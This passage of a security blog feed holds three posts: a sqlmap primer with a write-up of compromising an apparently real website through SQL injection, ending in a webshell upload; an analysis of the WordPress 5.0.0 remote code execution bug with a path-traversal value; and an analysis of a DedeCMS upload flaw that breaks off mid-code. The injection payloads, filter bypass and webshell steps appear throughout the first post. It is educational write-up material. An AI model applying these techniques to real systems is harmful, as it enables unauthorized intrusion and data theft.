<link href="http://yoursite.com/2019/03/10/sqlmap%E4%B8%8E%E4%B8%80%E6%AC%A1%E6%B8%97%E9%80%8F%E5%AE%9E%E6%88%98/"/>
<id>http://yoursite.com/2019/03/10/sqlmap与一次渗透实战/</id>
<published>2019-03-10T15:22:37.000Z</published>
<updated>2019-03-10T15:57:04.577Z</updated>
<content type="html"><![CDATA[<h2 id="sqlmap简介"><a href="#sqlmap简介" class="headerlink" title="sqlmap简介"></a>sqlmap简介</h2><p>sqlmap是一个渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它有功能强大的检测引擎,针对各种数据库的渗透测试的功能选项,能够获取数据库中存储的数据,访问操作系统文件,执行操作系统命令等。<br>以下是简单的参数介绍:</p><h3 id="请求"><a href="#请求" class="headerlink" title="请求"></a>请求</h3><table><thead><tr><th>命令</th><th style="text-align:center">注释</th></tr></thead><tbody><tr><td>- -date=DATE</td><td style="text-align:center">#通过post发送数据: </td></tr><tr><td>- -cookie=COOKIE</td><td style="text-align:center">#cookie头的值 </td></tr><tr><td>- -user-agent=AGENT</td><td style="text-align:center">#指定http user-agent头 </td></tr><tr><td>- -random-agent</td><td style="text-align:center">#使用随机user-agent头 </td></tr><tr><td>- -tor</td><td style="text-align:center">#使用匿名网络</td></tr><tr><td>- -proxy=IP</td><td style="text-align:center">#设置代理</td></tr><tr><td>- -timeout</td><td style="text-align:center">#超时等待时间</td></tr></tbody></table><h3 id="获取数据"><a href="#获取数据" class="headerlink" title="获取数据"></a>获取数据</h3><table><thead><tr><th>命令</th><th style="text-align:center">注释</th></tr></thead><tbody><tr><td>-a</td><td style="text-align:center">#检查一切 </td></tr><tr><td>- -users</td><td style="text-align:center">#数据库用户账户 </td></tr><tr><td>- -password</td><td style="text-align:center">#数据库账户密码 </td></tr><tr><td>- -is-dba</td><td style="text-align:center">#是否为root用户 </td></tr><tr><td>- -dbs</td><td style="text-align:center">#枚举数据库 </td></tr><tr><td>- -tables</td><td style="text-align:center">#枚举数据表 </td></tr><tr><td>- -columns</td><td style="text-align:center">#枚举字段 </td></tr><tr><td>- -count</td><td style="text-align:center">#检索表的条目数 </td></tr><tr><td>- -dump</td><td style="text-align:center">#转储数据库的表项 </td></tr><tr><td>- -dump-all</td><td style="text-align:center">#转储所有 </td></tr></tbody></table><h3 id="操作系统"><a href="#操作系统" class="headerlink" title="操作系统"></a>操作系统</h3><table><thead><tr><th>命令</th><th style="text-align:center">注释</th></tr></thead><tbody><tr><td>- -os-cmd=CMD</td><td style="text-align:center">#执行cmd命令 </td></tr><tr><td>- -os-shell</td><td style="text-align:center">#建立shell </td></tr><tr><td>- -os-pwn</td><td style="text-align:center">#获取OOB shell,meterpreter,vnc ,例:sqlmap -u xxx –os-pwn msf-path /usr/share/metasploit-framework/ </td></tr><tr><td>- -os-bof</td><td style="text-align:center">#存储过程缓冲区溢出 </td></tr><tr><td>- -priv-esc</td><td style="text-align:center">#数据库进程用户权限提升 </td></tr><tr><td>- -reg-read</td><td style="text-align:center">#读取注册表项 </td></tr><tr><td>- -reg-add</td><td style="text-align:center">#添加注册表项 </td></tr><tr><td>- -reg-del</td><td style="text-align:center">#删除注册表项 </td></tr></tbody></table><p>注:使用–os 命令会向目标写入一个文件上传脚本,然后通过该上传脚本上传shell、meterpreter等,并修改权限(phpversion<4.1.0时).</p><h2 id="一次渗透"><a href="#一次渗透" class="headerlink" title="一次渗透"></a>一次渗透</h2><p>对某网站进行渗透</p><h3 id="前期信息搜集"><a href="#前期信息搜集" class="headerlink" title="前期信息搜集"></a>前期信息搜集</h3><p>搜索该域名及IP,未发现有用信息.<br>使用御剑对网站目录进行扫描,未发现敏感信息:<br><img src="/2019/03/10/sqlmap与一次渗透实战/1.png" alt=""><br>在网站上也未找到后台和robots.txt. </p><h3 id="发现sql注入"><a href="#发现sql注入" class="headerlink" title="发现sql注入"></a>发现sql注入</h3><p>但是在一个查询页面发现了sql注入漏洞:<br><img src="/2019/03/10/sqlmap与一次渗透实战/2.png" alt=""><br>对这个点进行测试发现过滤了逗号,可以通过union select * from ((select 1)a JOIN (select 2)b JOIN (select 3)c)的方式绕过,尝试使用”into outfile”写文件却未成功,于是用sqlmap进行渗透.<br>输入命令:sqlmap.py -u “<a href="http://www.xxxx.com/cj.php?code=1"" target="_blank" rel="noopener">http://www.xxxx.com/cj.php?code=1"</a> ,获得以下信息:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">[15:38:05] [INFO] resuming back-end DBMS 'mysql'</span><br><span class="line">[15:38:05] [INFO] testing connection to the target URL</span><br><span class="line">sqlmap resumed the following injection point(s) from stored session:</span><br><span class="line">---</span><br><span class="line">Parameter: code (GET)</span><br><span class="line"> Type: boolean-based blind</span><br><span class="line"> Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)</span><br><span class="line"> Payload: code=1' OR NOT 9500=9500#</span><br><span class="line"></span><br><span class="line"> Type: error-based</span><br><span class="line"> Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)</span><br><span class="line"> Payload: code=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171716271,(SELECT (ELT(6682=6682,1))),0x716a6a6b71,0x78))s), 8446744073709551610, 8446744073709551610)))-- MBii</span><br><span class="line"></span><br><span class="line"> Type: AND/OR time-based blind</span><br><span class="line"> Title: MySQL >= 5.0.12 OR time-based blind</span><br><span class="line"> Payload: code=1' OR SLEEP(5)-- KVCY</span><br><span class="line"></span><br><span class="line"> Type: UNION query</span><br><span class="line"> Title: MySQL UNION query (NULL) - 13 columns</span><br><span class="line"> Payload: code=1' UNION ALL SELECT NULL,NULL,CONCAT(0x7171716271,0x53415242557265476b6b777379697a4173616e47734c4c4b555a45534a6e614e476178754e634253,0x716a6a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#</span><br><span class="line">---</span><br><span class="line">[15:38:05] [INFO] the back-end DBMS is MySQL</span><br><span class="line">web server operating system: Windows 2003 or XP</span><br><span class="line">web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.33</span><br><span class="line">back-end DBMS: MySQL >= 5.5</span><br></pre></td></tr></table></figure></p><p>可知该sql注入漏洞可以利用,并且获得了系统信息、数据库信息等等.</p><h3 id="利用sql注入"><a href="#利用sql注入" class="headerlink" title="利用sql注入"></a>利用sql注入</h3><p>由于不知道网站后台,即使通过sql注入漏洞获取账号密码也不能完成任务,不过我们可以利用该漏洞在目标服务器上写一个文件上传脚本,然后上传webshell.<br>输入命令:sqlmap.py -u “<a href="http://www.xxx.com/cj.php?code=1"" target="_blank" rel="noopener">http://www.xxx.com/cj.php?code=1"</a> - -os-cmd=ipconfig, 然后配置参数,因为不清楚路径,所以选择Y,让sqlmap自动获取路径:<br><img src="/2019/03/10/sqlmap与一次渗透实战/3.png" alt=""><br>执行后可以看到sqlmap获取了路径,并且写入了两个脚本,其中第一个就是文件上传脚本,第二个是执行cmd命令的脚本,但是执行失败了,不过我们写入文件上传脚本的目的达成了.<br><img src="/2019/03/10/sqlmap与一次渗透实战/4.png" alt=""></p><h3 id="上传webshell完成渗透"><a href="#上传webshell完成渗透" class="headerlink" title="上传webshell完成渗透"></a>上传webshell完成渗透</h3><p>利用前面sqlmap写入的文件上传脚本tmpuugsd.php向目标上传大马<br><img src="/2019/03/10/sqlmap与一次渗透实战/5.png" alt=""><br>最后利用webshell成功完成渗透任务. </p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>这次渗透关键一步是利用sqlmap写入一个文件上传脚本,如果不清楚- -os 命令的原理可能不能快速完成任务,因此在平时的学习中要注意了解各类工具的原理.另外在获取webshell后才发现网站后台是admin+名称!!!说明信息搜集不够完美,思路不够开拓,今后需要注意完善.</p>]]></content>
<summary type="html">
<h2 id="sqlmap简介"><a href="#sqlmap简介" class="headerlink" title="sqlmap简介"></a>sqlmap简介</h2><p>sqlmap是一个渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器
</summary>
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="SQL注入" scheme="http://yoursite.com/tags/SQL%E6%B3%A8%E5%85%A5/"/>
</entry>
<entry>
<title>WordPress 5.0.0远程代码执行漏洞分析</title>
<link href="http://yoursite.com/2019/03/03/WordPress-5-0-0%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/"/>
<id>http://yoursite.com/2019/03/03/WordPress-5-0-0远程代码执行漏洞分析/</id>
<published>2019-03-03T09:50:55.000Z</published>
<updated>2020-03-14T15:37:06.972Z</updated>
<content type="html"><![CDATA[<h1 id="wordpress-5-0-0-远程代码执行漏洞分析"><a href="#wordpress-5-0-0-远程代码执行漏洞分析" class="headerlink" title="wordpress 5.0.0 远程代码执行漏洞分析"></a>wordpress 5.0.0 远程代码执行漏洞分析</h1><h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>wordpress 5.0.0 远程代码执行漏洞于二月十九日由RIPS披露,博客地址:<a href="https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/" target="_blank" rel="noopener">https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/</a> ,<br>漏洞编号为:CVE-2019-8942和 CVE-2019-8943, 主要针对版本:WordPress before 4.9.9 and 5.x before 5.0.1 </p><h2 id="postmeta覆盖"><a href="#postmeta覆盖" class="headerlink" title="postmeta覆盖"></a>postmeta覆盖</h2><p>当编辑post时, 调用wp-admin/post.php 中的以下代码:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">case 'editpost':</span><br><span class="line">check_admin_referer('update-post_' . $post_id);</span><br><span class="line"></span><br><span class="line">$post_id = edit_post();</span><br><span class="line"></span><br><span class="line">// Session cookie flag that the post was saved</span><br><span class="line">if ( isset( $_COOKIE['wp-saving-post'] ) && $_COOKIE['wp-saving-post'] === $post_id . '-check' ) {</span><br><span class="line">setcookie( 'wp-saving-post', $post_id . '-saved', time() + DAY_IN_SECONDS, ADMIN_COOKIE_PATH, COOKIE_DOMAIN, is_ssl() );</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">redirect_post($post_id); // Send user on their way while we keep working</span><br><span class="line"></span><br><span class="line">exit();</span><br></pre></td></tr></table></figure></p><p>而edit_post()函数为:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">function edit_post( $post_data = null ) {</span><br><span class="line">global $wpdb;</span><br><span class="line"></span><br><span class="line">if ( empty($post_data) )</span><br><span class="line">$post_data = &$_POST;</span><br><span class="line"></span><br><span class="line">// Clear out any data in internal vars.</span><br><span class="line">unset( $post_data['filter'] );</span><br><span class="line"></span><br><span class="line">$post_ID = (int) $post_data['post_ID'];</span><br><span class="line">$post = get_post( $post_ID );</span><br><span class="line">$post_data['post_type'] = $post->post_type;</span><br><span class="line">$post_data['post_mime_type'] = $post->post_mime_type;</span><br><span class="line">...</span><br><span class="line">...</span><br><span class="line"></span><br><span class="line">$success = wp_update_post( $post_data ); //漏洞点</span><br><span class="line">// If the save failed, see if we can sanity check the main fields and try again</span><br><span class="line">...</span><br><span class="line">...</span><br><span class="line">...</span><br><span class="line">return $post_ID;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>这段代码将POST传入的数据赋给$post_data,而$post_data又传入wp_updata_post()中,wp_updata_post()的代码如下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">function wp_update_post( $postarr = array(), $wp_error = false ) {</span><br><span class="line">if ( is_object($postarr) ) {</span><br><span class="line">// Non-escaped post was passed.</span><br><span class="line">$postarr = get_object_vars($postarr);</span><br><span class="line">$postarr = wp_slash($postarr);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">// First, get all of the original fields.</span><br><span class="line">$post = get_post($postarr['ID'], ARRAY_A);</span><br><span class="line"></span><br><span class="line">if ( is_null( $post ) ) {</span><br><span class="line">if ( $wp_error )</span><br><span class="line">return new WP_Error( 'invalid_post', __( 'Invalid post ID.' ) );</span><br><span class="line">return 0;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">// Escape data pulled from DB.</span><br><span class="line">$post = wp_slash($post);</span><br><span class="line"></span><br><span class="line">// Passed post category list overwrites existing category list if not empty.</span><br><span class="line">if ( isset($postarr['post_category']) && is_array($postarr['post_category'])</span><br><span class="line"> && 0 != count($postarr['post_category']) )</span><br><span class="line">$post_cats = $postarr['post_category'];</span><br><span class="line">else</span><br><span class="line">$post_cats = $post['post_category'];</span><br><span class="line"></span><br><span class="line">// Drafts shouldn't be assigned a date unless explicitly done so by the user.</span><br><span class="line">if ( isset( $post['post_status'] ) && in_array($post['post_status'], array('draft', 'pending', 'auto-draft')) && empty($postarr['edit_date']) &&</span><br><span class="line"> ('0000-00-00 00:00:00' == $post['post_date_gmt']) )</span><br><span class="line">$clear_date = true;</span><br><span class="line">else</span><br><span class="line">$clear_date = false;</span><br><span class="line"></span><br><span class="line">// Merge old and new fields with new fields overwriting old ones.</span><br><span class="line">$postarr = array_merge($post, $postarr);</span><br><span class="line">$postarr['post_category'] = $post_cats;</span><br><span class="line">if ( $clear_date ) {</span><br><span class="line">$postarr['post_date'] = current_time('mysql');</span><br><span class="line">$postarr['post_date_gmt'] = '';</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">if ($postarr['post_type'] == 'attachment')</span><br><span class="line">return wp_insert_attachment($postarr);</span><br><span class="line"></span><br><span class="line">return wp_insert_post( $postarr, $wp_error ); //漏洞点</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>在函数末尾$postarr的值被传入wp_insert_post()中,该函数中有如下代码:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">if ( ! empty( $postarr['meta_input'] ) ) {</span><br><span class="line">foreach ( $postarr['meta_input'] as $field => $value ) {</span><br><span class="line">update_post_meta( $post_ID, $field, $value ); //漏洞点</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>该处会将meta_input参数取出,调用updata_post_meta()最后修改wp_postmeta表.</p><h2 id="目录遍历"><a href="#目录遍历" class="headerlink" title="目录遍历"></a>目录遍历</h2><p>目录遍历时需要前面修改的postmeta表中的_wp_attached_file字段的值,在wp-admin/includes/ajax-actions.php的wp_ajax_crop_image()函数中:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$cropped = wp_crop_image( $attachment_id, $data['x1'], $data['y1'], $data['width'], $data['height'], $data['dst_width'], $data['dst_height'] );</span><br></pre></td></tr></table></figure></p><p>此处调用wp_crop_image()函数,而该函数中有:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$src_file = get_attached_file( $src );</span><br></pre></td></tr></table></figure></p><p>该处获取postmeta表中_wp_attached_file的值,然后赋给$src_filez,之后检查是否存在该文件,不存在的话调用_load_image_edit_path()函数,该函数:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">function _load_image_to_edit_path( $attachment_id, $size = 'full' ) {</span><br><span class="line">$filepath = get_attached_file( $attachment_id );</span><br><span class="line"></span><br><span class="line">if ( $filepath && file_exists( $filepath ) ) {</span><br><span class="line">if ( 'full' != $size && ( $data = image_get_intermediate_size( $attachment_id, $size ) ) ) {</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">$filepath = apply_filters( 'load_image_to_edit_filesystempath', path_join( dirname( $filepath ), $data['file'] ), $attachment_id, $size );</span><br><span class="line">}</span><br><span class="line">} elseif ( function_exists( 'fopen' ) && true == ini_get( 'allow_url_fopen' ) ) {</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">$filepath = apply_filters( 'load_image_to_edit_attachmenturl', wp_get_attachment_url( $attachment_id ), $attachment_id, $size );</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">return apply_filters( 'load_image_to_edit_path', $filepath, $attachment_id, $size );</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>调用wp_get_attachment_url()后会生成一个url链接,所以如果meta_value被改为2019/03/1.jpg?/../../../1.jpg时生成的url是:<a href="http://127.0.0.1/wp-content/uploads/2019/03/1.jpg?/../../../1.jpg" target="_blank" rel="noopener">http://127.0.0.1/wp-content/uploads/2019/03/1.jpg?/../../../1.jpg</a> ,<br>这个url会一直返回到wp_crop_image()函数中,该函数中有:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$editor = wp_get_image_editor( $src );</span><br></pre></td></tr></table></figure></p><p>此处将url传入 wp_get_image_editor()函数中进行处理,该函数如下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">function wp_get_image_editor( $path, $args = array() ) {</span><br><span class="line">$args['path'] = $path;</span><br><span class="line"></span><br><span class="line">if ( ! isset( $args['mime_type'] ) ) {</span><br><span class="line">$file_info = wp_check_filetype( $args['path'] );</span><br><span class="line"></span><br><span class="line">// If $file_info['type'] is false, then we let the editor attempt to</span><br><span class="line">// figure out the file type, rather than forcing a failure based on extension.</span><br><span class="line">if ( isset( $file_info ) && $file_info['type'] )</span><br><span class="line">$args['mime_type'] = $file_info['type'];</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">$implementation = _wp_image_editor_choose( $args ); </span><br><span class="line"></span><br><span class="line">if ( $implementation ) {</span><br><span class="line">$editor = new $implementation( $path );</span><br><span class="line">$loaded = $editor->load();</span><br><span class="line"></span><br><span class="line">if ( is_wp_error( $loaded ) )</span><br><span class="line">return $loaded;</span><br><span class="line"></span><br><span class="line">return $editor;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">return new WP_Error( 'image_no_editor', __('No editor could be selected.') );</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>最后依然会返回路径,然后在wp_crop_image()函数中:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$result = $editor->save( $dst_file );</span><br></pre></td></tr></table></figure></p><p>图片会被保存到该路径,因此可以进行目录遍历。将图片保存到主题目录下可以通过包含执行恶意代码。</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>这个漏洞分析了好几天,思路非常清奇,涉及的函数比较多,而我安装在本地的wordpress与Xdebug会发生冲突,因此不能用phpstorm进行动态分析,这个问题还在解决中。通过这个漏洞的分析,我学习到:<br>数据库中存储的文件数据在存入取出过程中可能会产生漏洞,今后要多加关注。</p>]]></content>
<summary type="html">
<h1 id="wordpress-5-0-0-远程代码执行漏洞分析"><a href="#wordpress-5-0-0-远程代码执行漏洞分析" class="headerlink" title="wordpress 5.0.0 远程代码执行漏洞分析"></a>wordpres
</summary>
<category term="web安全" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/"/>
<category term="代码审计" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="代码审计" scheme="http://yoursite.com/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
</entry>
<entry>
<title>dedecms v5.7 sp2 文件上传漏洞[CVE-2019-8362]</title>
<link href="http://yoursite.com/2019/02/16/dedecms%20v5.7%20sp2%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/"/>
<id>http://yoursite.com/2019/02/16/dedecms v5.7 sp2文件上传漏洞/</id>
<published>2019-02-16T15:15:50.000Z</published>
<updated>2020-03-14T15:36:53.164Z</updated>
<content type="html"><![CDATA[<h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>织梦内容管理系统(DedeCms) ,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,在经历多年的发展,DedeCms的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。</p><h2 id="原理分析"><a href="#原理分析" class="headerlink" title="原理分析"></a>原理分析</h2><p>漏洞位于dede/album_edit.php或dede/album_add.php中:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"> /*---------------------</span><br><span class="line"> function _getformzip()</span><br><span class="line"> 从ZIP文件中获取新图片</span><br><span class="line"> ---------------------*/</span><br><span class="line">if($formzip==1)</span><br><span class="line"> {</span><br><span class="line"> include_once(DEDEINC."/zip.class.php");</span><br><span class="line"> include_once(DEDEADMIN."/file_class.php");</span><br><span class="line"> $zipfile = $cfg_basedir.str_replace($cfg_mainsite,'',$zipfile);</span><br><span class="line"> $tmpzipdir = DEDEDATA.'/ziptmp/'.cn_substr(md5(ExecTime()),16);</span><br><span class="line"> $ntime = time();</span><br><span class="line"> if(file_exists($zipfile))</span><br><span class="line"> {</span><br><span class="line"></span><br><span class="line"> @mkdir($tmpzipdir,$GLOBALS['cfg_dir_purview']);</span><br><span class="line"> @chmod($tmpzipdir,$GLOBALS['cfg_dir_purview']);</span><br><span class="line"> $z = new zip();</span><br><span class="line"> $z->ExtractAll($zipfile,$tmpzipdir);</span><br><span class="line"> $fm = new FileManagement();</span><br><span class="line"> $imgs = array();</span><br><span class="line"> $fm->GetMatchFiles($tmpzipdir,"jpg|png|gif",$imgs);</span><br><span class="line"> $i = 0;</span><br><span class="line"> foreach($imgs as $imgold)</span><br><span class="line"> {</span><br><span class="line"> $i++;</span><br><span class="line"> $savepath = $cfg_image_dir."/".MyDate("Y-m",$ntime);</span><br><span class="line"> CreateDir($savepath);</span><br><span class="line"> $iurl = $savepath."/".MyDate("d",$ntime).dd2char(MyDate("His",$ntime).'-'.$adminid."-{$i}".mt_rand(1000,9999));</span><br><span class="line"> $iurl = $iurl.substr($imgold,-4,4);</span><br><span class="line"> $imgfile = $cfg_basedir.$iurl;</span><br><span class="line"> copy($imgold,$imgfile);</span><br><span class="line"> unlink($imgold);</span><br><span class="line"> if(is_file($imgfile))</span><br><span class="line"> {</span><br><span class="line"> $litpicname = $pagestyle > 2 ? GetImageMapDD($iurl,$cfg_ddimg_width) : $iurl;</span><br><span class="line"> $info = '';</span><br><span class="line"> $imginfos = GetImageSize($imgfile,$info);</span><br><span class="line"> $imgurls .= "{dede:img ddimg='$litpicname' text='' width='".$imginfos[0]."' height='".$imginfos[1]."'} $iurl {/dede:img}\r\n";</span><br><span class="line"></span><br><span class="line"> //把图片信息保存到媒体文档管理档案中</span><br><span class="line"> $inquery = "</span><br><span class="line"> INSERT INTO #@__uploads(title,url,mediatype,width,height,playtime,filesize,uptime,mid)</span><br><span class="line"> VALUES ('{$title}','{$iurl}','1','".$imginfos[0]."','".$imginfos[1]."','0','".filesize($imgfile)."','".$ntime."','$adminid');</span><br><span class="line"> ";</span><br><span class="line"> $dsql->ExecuteNoneQuery($inquery);</span><br><span class="line"> if(!$hasone && $ddisfirst==1</span><br><span class="line"> && $litpic=="" && !empty($litpicname))</span><br><span class="line"> {</span><br><span class="line"> if( file_exists($cfg_basedir.$litpicname) )</span><br><span class="line"> {</span><br><span class="line"> $litpic = $litpicname;</span><br><span class="line"> $hasone = true;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> if($delzip==1)</span><br><span class="line"> {</span><br><span class="line"> unlink($zipfile);</span><br><span class="line"> }</span><br><span class="line"> $fm->RmDirFiles($tmpzipdir);</span><br><span class="line"> }</span><br><span class="line"> }</span><br></pre></td></tr></table></figure></p><p>此段代码的功能是从zip文件中获取图片,GetMatchFiles函数获取符合规则的图片(由传入参数知道是png,jpg,gif),<br>跟进GetMatchFiles函数:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">function GetMatchFiles($indir, $fileexp, &$filearr)</span><br><span class="line">{</span><br><span class="line"> $dh = dir($indir);</span><br><span class="line"> while($filename = $dh->read())</span><br><span class="line"> {</span><br><span class="line"> $truefile = $indir.'/'.$filename;</span><br><span class="line"> if($filename == "." || $filename == "..")</span><br><span class="line"> {</span><br><span class="line"> 